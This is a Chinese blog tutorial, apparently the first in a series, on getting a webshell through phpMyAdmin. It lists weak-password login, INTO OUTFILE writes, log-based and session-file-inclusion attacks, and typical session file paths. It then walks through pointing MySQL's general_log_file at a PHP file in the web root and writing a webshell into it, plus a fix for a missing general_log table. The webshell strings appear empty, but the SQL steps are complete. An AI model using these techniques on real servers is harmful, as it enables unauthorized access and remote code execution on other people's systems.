phpmyadmin系列渗透思路连载(一)

当拿到phpmyadin的站点后,我一般会尝试一下几种攻击手法:
1、通过弱口令进入后台,尝试into outfile写入一句话
条件:(1)有写的权限    (2)知道web绝对路径    (3)web路径可写(一般upload目录可写)
show variables like '%secure%';    #如果为null就不可写,=""就可写
select '' into outfile 'E:/www/xx/php';    #写入一句话木马

 

2、全局日志getshell
 
 
3、慢查询日志getshell
 
 
4、phpmyadmin文件包含漏洞getshell(包含session文件、CVE历史漏洞等等)
下面随机列举出几个常见的路径,仅供参考...
session文件一般路径:
1)可通过phpinfo的save_path进行查看
 
2)Linux:
/var/lib/php/sessions/sess_你的session
/tmp/sessions/sess_你的session
/tmp/sessions/sessions/sess_你的session
 
3)Phpstudy:/phpStudy/PHPTutorial/tmp/tmp/sess_你的session

 

本文将围绕通过全局日志getshell展开详细演示:

1、Mysql的两个全局变量:
前提条件:有读写权限,知道绝对路径
general log 指的是日志保存状态,一共有两个值(ON/OFF)ON代表开启 OFF代表关闭。
general log file 指的是日志的保存路径。
phpmyadmin系列渗透思路连载(一)_第1张图片

 

2、目前general_log为off状态,那么日志就没有被记录进去,所以先打开这个全局变量
show variables like '%general%';    //查找全局变量
set global general_log='on';              //打开全局变量
 phpmyadmin系列渗透思路连载(一)_第2张图片

 

打开过后,就会出现日志文件
phpmyadmin系列渗透思路连载(一)_第3张图片

 

日志文件内容
phpmyadmin系列渗透思路连载(一)_第4张图片

 

那我随便执行一条sql语句看看有没有被记录到日志文件中,果然
phpmyadmin系列渗透思路连载(一)_第5张图片

 

3、那么既然日志是保存在这个文件中,要写入一句话,应该要把日志存放的文件位置换成想要生成的一句话木马文件。那么就需要修改general_log_file变量的位置了。
set global general_log_file='D:/phpStudy/PHPTutorial/WWW/xxx.php';  //改变日志生成的地址,/是表示绝对路径
phpmyadmin系列渗透思路连载(一)_第6张图片
执行成功,去目录下面看看有没有生成这个文件,果然。
phpmyadmin系列渗透思路连载(一)_第7张图片

 

4、写入webshell进日志
select '';
 phpmyadmin系列渗透思路连载(一)_第8张图片

 

 

5、访问一波,成功解析。直接上工具连就行
phpmyadmin系列渗透思路连载(一)_第9张图片

 

 

奇技淫巧(来自互联网):
mysql版本: 5.5.53
尝试开启日志功能写文件,但是提示表  mysql.general_log不存在
mysql> set global general_log = on;
ERROR 1146 (42S02): Table 'mysql.general_log' doesn't exist
 
 
解决思路:
从其他数据库中提取表 mysql.general_log信息
然后切换到mysql库中执行以下SQL语句
CREATE TABLE IF NOT EXISTS `general_log` (
  `event_time` timestamp NOT NULL DEFAULT CURRENT_TIMESTAMP ON UPDATE CURRENT_TIMESTAMP,
  `user_host` mediumtext NOT NULL,
  `thread_id` int(11) NOT NULL,
  `server_id` int(10) unsigned NOT NULL,
  `command_type` varchar(64) NOT NULL,
  `argument` mediumtext NOT NULL
) ENGINE=CSV DEFAULT CHARSET=utf8 COMMENT='General log';
 
再次执行:
set global general_log = on;
select 'shell'    即成功拿到shell

 

 

 

你可能感兴趣的:(phpmyadmin系列渗透思路连载(一))